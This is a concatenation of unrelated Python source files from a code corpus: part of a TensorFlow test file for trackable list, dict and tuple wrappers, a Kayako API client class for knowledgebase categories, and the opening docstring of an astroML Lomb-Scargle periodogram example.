self.assertIsInstance(data_structures.ListWrapper([a]), list)
self.assertEqual(
tensor_shape.TensorShape([None, 2]).as_list(),
(data_structures.ListWrapper([None])
+ tensor_shape.TensorShape([2])).as_list())
def testAcceptsNonTrackableContent(self):
l = data_structures.ListWrapper([1, 2, 3])
self.assertEqual(l, [1, 2, 3])
def testWrapperChangesList(self):
l = []
l_wrapper = data_structures.ListWrapper(l)
l_wrapper.append(1)
self.assertEqual([1], l)
def testListChangesWrapper(self):
l = []
l_wrapper = data_structures.ListWrapper(l)
l.append(1)
self.assertEqual([1], l_wrapper)
def testLayerCollectionWithExternalMutation(self):
l = []
l_wrapper = data_structures.ListWrapper(l)
layer = core.Dense(1)
l.append(layer)
self.assertEqual([layer], l_wrapper.layers)
def testNotHashable(self):
with self.assertRaises(TypeError):
hash(data_structures.ListWrapper())
def testDelItem(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
del l[0]
self.assertEqual(l, [2, 3, 4])
self.assertUnableToSave(l, "Unable to save .*__delitem__")
def testDelSlice(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
del l[2:3]
self.assertEqual(l, [1, 2, 4])
self.assertUnableToSave(l, "Unable to save .*__delslice__")
def testSetSlice_canSaveForNonTrackableItems(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
l[:] = 2, 8, 9, 0
self.assertEqual(l, [2, 8, 9, 0])
l._maybe_initialize_trackable() # pylint: disable=protected-access
self.assertEqual(len(l._checkpoint_dependencies), 0) # pylint: disable=protected-access
def testSetSlice_cannotSaveIfTrackableModified(self):
v1 = resource_variable_ops.ResourceVariable(1.)
v2 = resource_variable_ops.ResourceVariable(1.)
l = data_structures.ListWrapper([1, 2, v1, v2])
l[:] = 2, 8, 9, v2
self.assertEqual(l, [2, 8, 9, v2])
self.assertUnableToSave(l, "Unable to save .*__setslice__")
def testSetSlice_truncate(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
l[:] = []
self.assertEqual(l, [])
def testSetSlice_extend(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
l[2:] = 1, 2, 3, 4
self.assertEqual(l, [1, 2, 1, 2, 3, 4])
def testIMulNegative(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
l *= -1
self.assertEqual(l, [1, 2, 3, 4] * -1)
self.assertUnableToSave(l, "Unable to save")
def testIMulPositive(self):
v = variables.Variable(1.)
l = data_structures.ListWrapper([1, 2, 3, 4, v])
self.assertEqual([("4", v)], l._checkpoint_dependencies)
root = util.Checkpoint(l=l)
prefix = os.path.join(self.get_temp_dir(), "ckpt")
path = root.save(prefix)
v.assign(5.)
l *= 2
self.assertEqual(l, [1, 2, 3, 4, v, 1, 2, 3, 4, v])
self.assertEqual([("4", v), ("9", v)], l._checkpoint_dependencies)
root.restore(path)
self.assertAllClose(1., v.numpy())
def testSort(self):
l = data_structures.ListWrapper([1, 2, 3, 4])
l.sort()
self.assertEqual(l, [1, 2, 3, 4])
# Regardless of being a no-op for the input list, we still refuse to save.
# This is intentional since otherwise we would end up with a hard to debug
# case for users (e.g. sometimes sort on a ListWrapper is trackable and
# other times it is not).
self.assertUnableToSave(l, "Unable to save .*sort")
def assertUnableToSave(self, l, msg):
l._maybe_initialize_trackable() # pylint: disable=protected-access
with self.assertRaisesRegexp(ValueError, msg):
return l._checkpoint_dependencies # pylint: disable=protected-access
class HasMapping(training.Model):
def __init__(self):
super(HasMapping, self).__init__()
self.layer_dict = data_structures.Mapping(output=core.Dense(7))
self.layer_dict["norm"] = data_structures.List()
self.layer_dict["dense"] = data_structures.List()
self.layer_dict["dense"].extend(
[core.Dense(5),
core.Dense(6, kernel_regularizer=math_ops.reduce_sum)])
self.layer_dict["norm"].append(
normalization.BatchNormalization())
self.layer_dict["norm"].append(
normalization.BatchNormalization())
def call(self, x):
aggregation = 0.
for norm, dense in zip(self.layer_dict["norm"], self.layer_dict["dense"]):
x = norm(dense(x))
aggregation += math_ops.reduce_sum(x)
return self.layer_dict["output"](x) / aggregation
class MappingTests(test.TestCase):
@test_util.run_in_graph_and_eager_modes
def testTracking(self):
model = HasMapping()
output = model(array_ops.ones([32, 2]))
self.assertAllEqual([32, 7], output.shape.as_list())
self.assertEqual(5, len(model.layers))
six.assertCountEqual(self, model.layers, model.layer_dict.layers)
self.assertEqual(1, len(model._checkpoint_dependencies))
self.assertIs(model.layer_dict, model._checkpoint_dependencies[0].ref)
self.evaluate([v.initializer for v in model.variables])
test_var = model.layer_dict["output"].kernel
self.evaluate(test_var.assign(array_ops.ones([6, 7])))
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
self.evaluate(test_var.assign(array_ops.zeros([6, 7])))
model.load_weights(save_path)
self.assertAllEqual(numpy.ones([6, 7]),
self.evaluate(test_var))
def testJSONSerialization(self):
obj = tracking.AutoTrackable()
obj.d = {"a": 2}
json.dumps(obj.d, default=serialization.get_json_type)
def testNoOverwrite(self):
mapping = data_structures.Mapping()
original = data_structures.List()
mapping["a"] = original
with self.assertRaises(ValueError):
mapping["a"] = data_structures.List()
self.assertIs(original, mapping["a"])
with self.assertRaises(AttributeError):
del mapping["a"]
mapping.update(b=data_structures.Mapping())
with self.assertRaises(ValueError):
mapping.update({"b": data_structures.Mapping()})
def testNonStringKeys(self):
mapping = data_structures.Mapping()
with self.assertRaises(TypeError):
mapping[1] = data_structures.List()
def testLayerCollectionWithExternalMutation(self):
d = {}
root = tracking.AutoTrackable()
root.wrapper = d
self.assertEqual([], root.wrapper.layers)
self.assertEqual([], root.wrapper.trainable_weights)
layer1 = core.Dense(1)
layer2 = core.Dense(1)
d["a"] = layer1
d["b"] = layer2
self.assertEqual([layer1, layer2], root.wrapper.layers)
# The layers have still not created variables
self.assertEqual([], root.wrapper.trainable_weights)
def testHashing(self):
has_mappings = set([data_structures.Mapping(),
data_structures.Mapping()])
self.assertEqual(2, len(has_mappings))
self.assertNotIn(data_structures.Mapping(), has_mappings)
# In contrast to Mapping, dict wrappers are not hashable
a = tracking.AutoTrackable()
a.d = {}
self.assertEqual({}, a.d)
self.assertFalse({} != a.d) # pylint: disable=g-explicit-bool-comparison
self.assertNotEqual({1: 2}, a.d)
with self.assertRaisesRegexp(TypeError, "unhashable"):
set([a.d])
def testDictWrapperBadKeys(self):
a = tracking.AutoTrackable()
a.d = {}
a.d[1] = data_structures.List()
model = training.Model()
model.sub = a
save_path = os.path.join(self.get_temp_dir(), "ckpt")
with self.assertRaisesRegexp(ValueError, "non-string key"):
model.save_weights(save_path)
def testDictWrapperNoDependency(self):
a = tracking.AutoTrackable()
a.d = data_structures.NoDependency({})
a.d[1] = [3]
self.assertEqual([a], util.list_objects(a))
model = training.Model()
model.sub = a
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
model.load_weights(save_path)
def testNonStringKeyNotTrackableValue(self):
a = tracking.AutoTrackable()
a.d = {}
a.d["a"] = [3]
a.d[1] = data_structures.NoDependency([3])
self.assertEqual([a, a.d, a.d["a"]], util.list_objects(a))
model = training.Model()
model.sub = a
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
model.load_weights(save_path)
def testNonAppendNotTrackable(self):
# Non-append mutations (deleting or overwriting values) are OK when the
# values aren't tracked.
a = tracking.AutoTrackable()
a.d = {}
a.d["a"] = [3]
a.d[1] = 3
a.d[1] = 2
self.assertEqual(2, a.d[1])
del a.d[1]
a.d[2] = data_structures.NoDependency(tracking.AutoTrackable())
second = tracking.AutoTrackable()
a.d[2] = data_structures.NoDependency(second)
self.assertIs(second, a.d[2])
self.assertEqual([a, a.d, a.d["a"]], util.list_objects(a))
model = training.Model()
model.sub = a
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
model.load_weights(save_path)
def testPopNoSave(self):
model = training.Model()
model.d = {}
model.d["a"] = []
model.d.pop("a")
save_path = os.path.join(self.get_temp_dir(), "ckpt")
with self.assertRaisesRegexp(ValueError, "Unable to save"):
model.save_weights(save_path)
def testExternalModificationNoSave(self):
model = training.Model()
external_reference = {}
model.d = external_reference
external_reference["a"] = []
save_path = os.path.join(self.get_temp_dir(), "ckpt")
with self.assertRaisesRegexp(ValueError, "modified outside the wrapper"):
model.save_weights(save_path)
def testOverwriteCanStillSave(self):
model = training.Model()
model.d = {}
model.d["a"] = {}
model.d["a"] = {}
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
def testIter(self):
model = training.Model()
model.d = {1: 3}
model.d[1] = 3
self.assertEqual([1], list(model.d))
new_dict = {}
# This update() is super tricky. If the dict wrapper subclasses dict,
# CPython will access its storage directly instead of calling any
# methods/properties on the object. So the options are either not to
# subclass dict (in which case update will call normal iter methods, but the
# object won't pass isinstance checks) or to subclass dict and keep that
# storage updated (no shadowing all its methods like ListWrapper).
new_dict.update(model.d)
self.assertEqual({1: 3}, new_dict)
def testListShallowCopy(self):
root = tracking.AutoTrackable()
orig_list = [[1.]]
root.a = orig_list
copied = copy.copy(root.a)
self.assertAllEqual([[1.]], copied)
self.assertIsNot(root.a, copied)
self.assertIs(root.a[0], copied[0])
# Dirtiness should be inherited
util.list_objects(root.a)
orig_list.append(1.)
with self.assertRaises(ValueError):
util.list_objects(root.a)
with self.assertRaises(ValueError):
util.list_objects(copy.copy(root.a))
def testListDeepCopy(self):
root = tracking.AutoTrackable()
orig_list = [[1.]]
root.a = orig_list
copied = copy.deepcopy(root.a)
self.assertAllEqual([[1.]], copied)
self.assertIsNot(root.a, copied)
self.assertIsNot(root.a[0], copied[0])
# Dirtiness should be inherited
util.list_objects(root.a)
orig_list.append(1.)
with self.assertRaises(ValueError):
util.list_objects(root.a)
with self.assertRaises(ValueError):
util.list_objects(copy.deepcopy(root.a))
def testDictShallowCopy(self):
root = tracking.AutoTrackable()
orig_dict = {"a": [1.]}
root.a = orig_dict
copied = copy.copy(root.a)
self.assertAllEqual([1.], copied["a"])
self.assertIsNot(root.a, copied)
self.assertIs(root.a["a"], copied["a"])
copied = root.a.copy()
self.assertAllEqual([1.], copied["a"])
self.assertIsNot(root.a, copied)
self.assertIs(root.a["a"], copied["a"])
# Dirtiness should be inherited
util.list_objects(root.a)
orig_dict["b"] = []
with self.assertRaises(ValueError):
util.list_objects(root.a)
with self.assertRaises(ValueError):
util.list_objects(copy.copy(root.a))
def testDictDeepCopy(self):
root = tracking.AutoTrackable()
orig_dict = {"a": [1.]}
root.a = orig_dict
copied = copy.deepcopy(root.a)
self.assertAllEqual([1.], copied["a"])
self.assertIsNot(root.a, copied)
self.assertIsNot(root.a["a"], copied["a"])
# Dirtiness should be inherited
util.list_objects(root.a)
orig_dict["b"] = []
with self.assertRaises(ValueError):
util.list_objects(root.a)
with self.assertRaises(ValueError):
util.list_objects(copy.deepcopy(root.a))
def testShallowCopyTrackable(self):
original = tracking.AutoTrackable()
original_sub = tracking.AutoTrackable()
original.a = [[1.]]
original.b = {"a": original_sub}
shallow_copied = copy.copy(original)
self.assertIs(original_sub, shallow_copied.b["a"])
self.assertIsNot(original, shallow_copied)
self.assertEqual([[1.]], shallow_copied.a)
shallow_deps = util.list_objects(shallow_copied)
self.assertIn(shallow_copied.a, shallow_deps)
self.assertIn(shallow_copied.b, shallow_deps)
self.assertIn(shallow_copied.b["a"], shallow_deps)
def testDeepCopyTrackable(self):
original = tracking.AutoTrackable()
original_sub = tracking.AutoTrackable()
original.a = [[1.]]
original.b = {"a": original_sub}
self.assertIsInstance(original.b, dict)
deep_copied = copy.deepcopy(original)
self.assertIsInstance(deep_copied.b, dict)
self.assertIsNot(original, deep_copied)
self.assertIsNot(original_sub, deep_copied.b["a"])
self.assertEqual([[1.]], deep_copied.a)
self.assertIsInstance(deep_copied.b["a"], tracking.AutoTrackable)
deps = util.list_objects(deep_copied)
self.assertIn(deep_copied.a, deps)
self.assertIn(deep_copied.b, deps)
self.assertIn(deep_copied.b["a"], deps)
self.assertNotIn(original_sub, deps)
def testConstructableFromSequence(self):
result = data_structures._DictWrapper([(1, 2), (3, 4)])
self.assertIsInstance(result, dict)
self.assertEqual({1: 2, 3: 4}, result)
def testPickle(self):
original = data_structures._DictWrapper(dict(a=1, b=2))
serialized = pickle.dumps(original)
del original
deserialized = pickle.loads(serialized)
self.assertEqual(dict(a=1, b=2), deserialized)
def testListAddOrder(self):
self.assertEqual([1., 2.],
data_structures.ListWrapper([1.])
+ data_structures.ListWrapper([2.]))
self.assertEqual([1., 2.],
data_structures.ListWrapper([1.])
+ [2.])
self.assertEqual([1., 2.],
[1.]
+ data_structures.ListWrapper([2.]))
def testSameStructure(self):
d = {1: "a"}
nest.assert_same_structure(d, data_structures._DictWrapper(d.copy()))
def testFunctionCaching(self):
@def_function.function
def f(dict_input):
return dict_input["x"] + constant_op.constant(1.)
first_trace = f.get_concrete_function({"x": constant_op.constant(2.)})
second_trace = f.get_concrete_function(
data_structures._DictWrapper({"x": constant_op.constant(3.)}))
self.assertIs(first_trace, second_trace)
class HasTuple(training.Model):
def __init__(self):
super(HasTuple, self).__init__()
self.layer_list = (
core.Dense(3), core.Dense(4),
core.Dense(5, kernel_regularizer=math_ops.reduce_sum))
self.layers_with_updates = (normalization.BatchNormalization(),)
def call(self, x):
aggregation = 0.
for l in self.layer_list:
x = l(x)
aggregation += math_ops.reduce_sum(x)
bn, = self.layers_with_updates
return bn(x) / aggregation
class TupleTests(test.TestCase, parameterized.TestCase):
@test_util.run_in_graph_and_eager_modes
def testTracking(self):
model = HasTuple()
output = model(array_ops.ones([32, 2]))
self.assertAllEqual([32, 5], output.shape.as_list())
self.assertLen(model.layers, 4)
self.assertLen(model.layer_list.layers, 3)
six.assertCountEqual(
self,
model.layers,
tuple(model.layer_list.layers) + model.layers_with_updates)
self.assertEqual(3, model.layer_list.layers[0].units)
self.assertEqual(4, model.layer_list.layers[1].units)
self.assertEqual(5, model.layer_list.layers[2].units)
self.assertLen(model._checkpoint_dependencies, 2)
self.assertIs(model.layer_list, model._checkpoint_dependencies[0].ref)
self.assertIs(model.layers_with_updates,
model._checkpoint_dependencies[1].ref)
self.assertLen(
model._checkpoint_dependencies[0].ref._checkpoint_dependencies, 3)
self.evaluate([v.initializer for v in model.variables])
self.evaluate(model.variables[0].assign([[1., 2., 3.], [4., 5., 6.]]))
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
self.evaluate(model.variables[0].assign(array_ops.zeros([2, 3])))
model.load_weights(save_path)
self.assertAllEqual([[1., 2., 3.], [4., 5., 6.]],
self.evaluate(model.variables[0]))
v = variables.Variable(1.)
model.var_list = (v,)
self.assertIn(id(v), [id(obj) for obj in model.variables])
self.assertIn(id(v), [id(obj) for obj in model.trainable_variables])
self.assertNotIn(id(v), [id(obj) for obj in model.non_trainable_variables])
self.assertIn(id(model.layer_list[0].trainable_weights[0]),
[id(obj) for obj in model.trainable_weights])
@parameterized.named_parameters(
("Module", module.Module),
("Model", training.Model),
)
def testSubModelTracking(self, module_subclass):
model = module_subclass()
model.v = variables.Variable(1.)
self.assertIn(model.v, model.trainable_variables)
model2 = module_subclass()
model2.m = (model,)
self.assertIn(model.v, model2.trainable_variables)
def testSubSequentialTracking(self):
class _Subclassed(training.Model):
def __init__(self, wrapped):
super(_Subclassed, self).__init__()
self._wrapped = wrapped
def call(self, x):
return self._wrapped(x)
model = sequential.Sequential()
layer = core.Dense(1)
model.add(layer)
model2 = _Subclassed(model)
model2(array_ops.ones([1, 2]))
model2.m = (model,)
self.assertIn(layer.kernel, model2.trainable_weights)
def testJSONSerialization(self):
obj = tracking.AutoTrackable()
obj.l = (1,)
json.dumps(obj.l, default=serialization.get_json_type)
def testUpdatesForwarded(self):
with ops.Graph().as_default():
model = HasTuple()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertNotEmpty(model.layers_with_updates[0].updates)
self.assertEqual(set(model.layers_with_updates[0].updates),
set(model.updates))
model = HasTuple()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertEmpty(model.updates)
@test_util.run_in_graph_and_eager_modes
def testLossesForwarded(self):
model = HasTuple()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertLen(model.losses, 1)
def testModelContainersCompareEqual(self):
class HasEqualContainers(training.Model):
def __init__(self):
super(HasEqualContainers, self).__init__()
self.l1 = ()
self.l2 = ()
model = HasEqualContainers()
first_layer = HasEqualContainers()
model.l1 = (first_layer,)
second_layer = HasEqualContainers()
model.l2 = (second_layer,)
self.assertEqual((first_layer,), model.l1)
d = {model.l1: 1, model.l2: 2}
self.assertEqual(1, d[model.l1])
self.assertEqual(1, d[(first_layer,)])
self.assertEqual(2, d[model.l2])
self.assertEqual(2, d[(second_layer,)])
self.assertEqual([first_layer, second_layer], model.layers)
@test_util.run_in_graph_and_eager_modes
def testTensorConversion(self):
class TupleToTensor(training.Model):
def __init__(self):
super(TupleToTensor, self).__init__()
self.l = (1., 2., 3.)
self.assertAllEqual(
(1., 2., 3.),
self.evaluate(constant_op.constant(TupleToTensor().l)))
self.assertAllEqual(
(1., 2., 3.),
self.evaluate(array_ops.pack(TupleToTensor().l)))
def testNonLayerVariables(self):
v = resource_variable_ops.ResourceVariable([1.])
l = data_structures._TupleWrapper((v,))
self.assertEqual([], l.layers)
self.assertEqual([v], l.variables)
self.assertEqual([v], l.trainable_weights)
self.assertEqual([], l.non_trainable_variables)
def testCopy(self):
v1 = resource_variable_ops.ResourceVariable(1.)
v2 = resource_variable_ops.ResourceVariable(1.)
l1 = data_structures._TupleWrapper((v1, v2))
l2 = copy.copy(l1)
self.assertEqual(l1, (v1, v2))
self.assertEqual(l2, (v1, v2))
self.assertIs(l1[0], l2[0])
l2_deep = copy.deepcopy(l1)
self.assertIsNot(l1[0], l2_deep[0])
with self.assertRaises(AttributeError):
l2.append(v1)
def testSlicing(self):
v1 = resource_variable_ops.ResourceVariable(1.)
v2 = resource_variable_ops.ResourceVariable(1.)
v3 = resource_variable_ops.ResourceVariable(1.)
v4 = resource_variable_ops.ResourceVariable(1.)
l = data_structures._TupleWrapper((v1, v2, v3, v4))
self.assertEqual(l[1:], (v2, v3, v4))
self.assertEqual(l[1:-1], (v2, v3))
self.assertEqual(l[:-1], (v1, v2, v3))
def testHash(self):
has_sequences = set([data_structures._TupleWrapper(),
data_structures._TupleWrapper()])
self.assertLen(has_sequences, 1)
self.assertIn(data_structures._TupleWrapper(), has_sequences)
def testIMul_zero(self):
l = data_structures._TupleWrapper((1,))
l *= 0
self.assertEqual((), l)
def testIMul(self):
# Note: tuple behavior differs from list behavior. Lists are mutated by
# imul/iadd, tuples assign a new object to the left hand side of the
# expression.
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures._TupleWrapper((v,))
original = l
l *= 2
self.assertEqual(l, (v,) * 2)
self.assertNotEqual(original, (v,) * 2)
def testIAdd(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures._TupleWrapper((v,))
original = l
l += (1,)
self.assertEqual(l, (v, 1))
self.assertNotEqual(original, (v, 1))
self.assertEqual(original, (v,))
def testMul(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures._TupleWrapper((v, v, v))
self.assertEqual(l * 2, (v, v, v) * 2)
def testRMul(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures._TupleWrapper((v, v, v))
self.assertEqual(2 * l, (v, v, v) * 2)
def testPickle(self):
original = data_structures._TupleWrapper((1, 2))
serialized = pickle.dumps(original)
del original
deserialized = pickle.loads(serialized)
self.assertEqual((1, 2), deserialized)
def testNamedTuple(self):
named = collections.namedtuple("Named", ("x", "y"))
v = variables.Variable(2)
nt = named(x=v, y=2)
m = module.Module()
m.nt = nt
self.assertIs(v, m.nt.x)
self.assertIs(v, m.nt[0])
self.assertIs(
v, m._checkpoint_dependencies[0].ref._checkpoint_dependencies[0].ref)
self.assertEqual(2, m.nt.y)
def testNamedSubclassing(self):
named = collections.namedtuple("Named", ("x", "y"))
v = variables.Variable(2)
class NamedSubclass(named):
def __new__(cls, x, y):
del y # unused
return super(NamedSubclass, cls).__new__(cls, x, 3)
@property
def summed(self):
return self.x + self.y
nt = NamedSubclass(x=v, y=2)
m = module.Module()
m.nt = nt
self.assertEqual(3, m.nt.y)
self.assertIs(v, m.nt.x)
self.assertIs(
v, m._checkpoint_dependencies[0].ref._checkpoint_dependencies[0].ref)
self.assertEqual("x", m.nt._checkpoint_dependencies[0].name)
self.assertEqual("0", m.nt._checkpoint_dependencies[1].name)
self.assertEqual(5, self.evaluate(m.nt.summed))
def testUnnamedSubclassing(self):
v = variables.Variable(2)
class UnnamedSubclass(tuple):
@property
def summed(self):
return self[0] + self[1]
unt = UnnamedSubclass([v, 2])
m = module.Module()
m.unt = unt
self.assertEqual("0", m.unt._checkpoint_dependencies[0].name)
self.assertLen(m.unt._checkpoint_dependencies, 1)
self.assertEqual(4, self.evaluate(m.unt.summed))
nest.assert_same_structure(
[m.unt], nest.map_structure(lambda x: x, [m.unt]))
def testNamedtupleSubclassWithCustomNew(self):
class SubclassWithDifferentArgs(collections.namedtuple("A", ["x"])):
def __new__(cls):
return super(SubclassWithDifferentArgs, cls).__new__(cls, [])
nt = SubclassWithDifferentArgs()
m = module.Module()
m.nt = nt
m.nt.x.append(variables.Variable(1.))
prefix = os.path.join(self.get_temp_dir(), "ckpt")
ckpt = util.Checkpoint(m=m)
with self.assertRaises(ValueError):
ckpt.save(prefix)
def testSameStructure(self):
t = (variables.Variable(1.),)
m = module.Module()
m.t = t
nest.assert_same_structure(t, m.t)
nest.assert_same_structure(m.t, t)
nt_type = collections.namedtuple("nt", ["x", "y"])
nt = nt_type(x=1, y=2)
m.nt = nt
nest.assert_same_structure(m.nt, nt)
with self.assertRaises(TypeError): # pylint: disable=g-error-prone-assert-raises
nest.assert_same_structure(m.nt, m.t)
def testFlatten(self):
t = data_structures._TupleWrapper((1, data_structures._TupleWrapper((2,))))
self.assertEqual([1, 2], nest.flatten(t))
self.assertEqual(
nest.flatten_with_tuple_paths((1, (2,))),
nest.flatten_with_tuple_paths(t))
self.assertEqual((3, (4,)),
nest.pack_sequence_as(t, [3, 4]))
nt_type = collections.namedtuple("nt", ["x", "y"])
nt = nt_type(1., 2.)
wrapped_nt = data_structures._TupleWrapper(nt)
self.assertEqual(
nest.flatten_with_tuple_paths(nt),
nest.flatten_with_tuple_paths(wrapped_nt))
self.assertEqual((3, 4,),
nest.pack_sequence_as(wrapped_nt, [3, 4]))
self.assertEqual(3, nest.pack_sequence_as(wrapped_nt, [3, 4]).x)
def testFunctionCaching(self):
@def_function.function
def f(tuple_input):
return tuple_input[0] + constant_op.constant(1.)
first_trace = f.get_concrete_function((constant_op.constant(2.),))
second_trace = f.get_concrete_function(
data_structures._TupleWrapper((constant_op.constant(3.),)))
self.assertIs(first_trace, second_trace)
def testPythonMapImpl(self):
t = data_structures._TupleWrapper((1, data_structures._TupleWrapper((2,))))
self.assertEqual(
(4, (5,)),
nest.map_structure_up_to((None, (None,)), lambda x: x + 3, t,
check_types=True))
nest.assert_shallow_structure((None, None), t)
def testDatasetMap(self):
dataset = dataset_ops.Dataset.from_tensor_slices(
constant_op.constant([1, 2, 3]))
dataset = dataset.map(lambda x: data_structures._TupleWrapper((x,)))
for index, element in enumerate(dataset):
self.assertEqual((index + 1,), self.evaluate(element))
def testDatasetMapNamed(self):
nt_type = collections.namedtuple("A", ["x"])
dataset = dataset_ops.Dataset.from_tensor_slices(
constant_op.constant([1, 2, 3]))
dataset = dataset.map(lambda x: data_structures._TupleWrapper(nt_type(x)))
for index, element in enumerate(dataset):
self.assertEqual((index + 1,), self.evaluate(element))
def testLoopAssignedModule(self):
m = module.Module()
m.s = (m,)
self.assertLen(m._checkpoint_dependencies, 1)
self.assertIs(m.s, m._checkpoint_dependencies[0].ref)
self.assertIs("s", m._checkpoint_dependencies[0].name)
self.assertEqual((), m.trainable_variables)
if __name__ == "__main__":
test.main()
| gunan/tensorflow | tensorflow/python/training/tracking/data_structures_test.py | Python | apache-2.0 | 43,039 |
# -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (c) 2014, Ravi Sharma
#
# Distributed under the terms of the Lesser GNU General Public License (LGPL)
#-----------------------------------------------------------------------------
'''
Created on Jan 15, 2014
@author: Ravi Sharma
'''
from lxml import etree
from kayako.core.lib import UnsetParameter
from kayako.core.object import KayakoObject
from kayako.exception import KayakoRequestError, KayakoResponseError
class KnowledgebaseCategory(KayakoObject):
'''
Knowledgebase Category API Object.
title The title of the Category.
categorytype Category type. Global: 1, public: 2, private:3, inherit: 4.
parentkbcategoryid The parent category ID.
displayorder A positive integer that the helpdesk will use to sort Category when displaying them (ascending).
articlesortorder A article sort order. Sort inherti: 1, sort title: 2, sort rating: 3, sort creationdate: 4, sort displayorder: 5 .
allowcomments 1 or 0 boolean that controls whether or not to Allow comments of this category.
allowrating 1 or 0 boolean that controls whether or not to Allow rating of this category.
ispublished Toggle the published yes/no property using this flag.
uservisibilitycustom 1 or 0 boolean that controls whether or not to restrict visibility of this category to particular user groups.
usergroupidlist A list of usergroup id's identifying the user groups to be assigned to this category (see usergroupidlist[]).
staffvisibilitycustom Toggle the staff visibility custom yes/no property using this flag.
staffgroupidlist The staff group ID list. Multiple values can be comma separated like 1,2,3.
staffid The creator staff ID.
'''
controller = '/Knowledgebase/Category'
__parameters__ = ['id', 'title', 'categorytype', 'parentkbcategoryid', 'displayorder', 'totalarticles', 'articlesortorder', 'allowcomments', 'allowrating', 'ispublished', 'uservisibilitycustom',
'usergroupidlist', 'staffvisibilitycustom', 'staffgroupidlist', 'staffid']
__required_add_parameters__ = ['title', 'categorytype']
__add_parameters__ = ['id', 'title', 'categorytype', 'parentkbcategoryid', 'displayorder', 'articlesortorder', 'allowcomments', 'allowrating', 'ispublished', 'uservisibilitycustom',
'usergroupidlist', 'staffvisibilitycustom', 'staffgroupidlist', 'staffid']
__required_save_parameters__ = ['title', 'categorytype']
__save_parameters__ = ['id', 'title', 'categorytype', 'parentkbcategoryid', 'displayorder', 'articlesortorder', 'allowcomments', 'allowrating', 'ispublished', 'uservisibilitycustom',
'usergroupidlist', 'staffvisibilitycustom', 'staffgroupidlist', 'staffid']
@classmethod
def _parse_knowledgebase_category(cls, api, _parse_knowledgebase_category):
usergroups = []
usergroups_node = _parse_knowledgebase_category.find('usergroupidlist')
if usergroups_node is not None:
for id_node in usergroups_node.findall('usergroupid'):
id = cls._get_int(id_node)
usergroups.append(id)
staffgroups = []
staffgroups_node = _parse_knowledgebase_category.find('staffgroupidlist')
if staffgroups_node is not None:
for id_node in staffgroups_node.findall('staffgroupid'):
id = cls._get_int(id_node)
staffgroups.append(id)
params = dict(
id=cls._get_int(_parse_knowledgebase_category.find('id')),
parentkbcategoryid=cls._get_int(_parse_knowledgebase_category.find('parentkbcategoryid')),
staffid=cls._get_int(_parse_knowledgebase_category.find('staffid')),
title=cls._get_string(_parse_knowledgebase_category.find('title')),
totalarticles=cls._get_int(_parse_knowledgebase_category.find('totalarticles')),
categorytype=cls._get_int(_parse_knowledgebase_category.find('categorytype')),
displayorder=cls._get_int(_parse_knowledgebase_category.find('displayorder')),
allowcomments=cls._get_boolean(_parse_knowledgebase_category.find('allowcomments')),
uservisibilitycustom=cls._get_boolean(_parse_knowledgebase_category.find('uservisibilitycustom')),
usergroupidlist=usergroups,
staffvisibilitycustom=cls._get_boolean(_parse_knowledgebase_category.find('staffvisibilitycustom')),
staffgroupidlist=staffgroups,
allowrating=cls._get_boolean(_parse_knowledgebase_category.find('allowrating')),
ispublished=cls._get_boolean(_parse_knowledgebase_category.find('ispublished')),
)
return params
def _update_from_response(self, _parse_knowledgebase_category):
usergroups_node = _parse_knowledgebase_category.find('usergroupidlist')
if usergroups_node is not None:
usergroups = []
for id_node in usergroups_node.findall('usergroupid'):
id = self._get_int(id_node)
usergroups.append(id)
self.usergroupidlist = usergroups
for int_node in ['id', 'categorytype', 'parentkbcategoryid', 'displayorder', 'articlesortorder', 'uservisibilitycustom', 'staffid']:
node = _parse_knowledgebase_category.find(int_node)
if node is not None:
setattr(self, int_node, self._get_int(node, required=False))
for str_node in ['title', 'staffvisibilitycustom']:
node = _parse_knowledgebase_category.find(str_node)
if node is not None:
setattr(self, str_node, self._get_string(node))
for bool_node in ['allowcomments', 'allowrating', 'ispublished']:
node = _parse_knowledgebase_category.find(bool_node)
if node is not None:
setattr(self, bool_node, self._get_boolean(node, required=False))
@classmethod
def get_all(cls, api, count=100, start=0):
response = api._request('%s/ListAll/%s/%s/' % (cls.controller, count, start), 'GET')
tree = etree.parse(response)
return [KnowledgebaseCategory(api, **cls._parse_knowledgebase_category(api, _parse_knowledgebase_category)) for _parse_knowledgebase_category in tree.findall('kbcategory')]
@classmethod
def get(cls, api, id):
response = api._request('%s/%s/' % (cls.controller, id), 'GET')
tree = etree.parse(response)
node = tree.find('kbcategory')
if node is None:
return None
params = cls._parse_knowledgebase_category(api, node)
return KnowledgebaseCategory(api, **params)
def add(self):
response = self._add(self.controller)
tree = etree.parse(response)
node = tree.find('kbcategory')
self._update_from_response(node)
def save(self):
response = self._save('%s/%s/' % (self.controller, self.id))
tree = etree.parse(response)
node = tree.find('kbcategory')
self._update_from_response(node)
def delete(self):
self._delete('%s/%s/' % (self.controller, self.id))
def __str__(self):
return '<KnowledgebaseCategory (%s): %s>' % (self.id, self.title) | sahilsehgal81/python-api-library | src/kayako/objects/knowledgebase/knowledgebase_category.py | Python | bsd-2-clause | 6,763 |
"""
Comparison of Lomb-Scargle Methods
----------------------------------
This shows a comparison of the Lomb-Scargle periodogram
and the Modified Lomb-Scargle periodogram for a single star,
along with the multi-term results.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
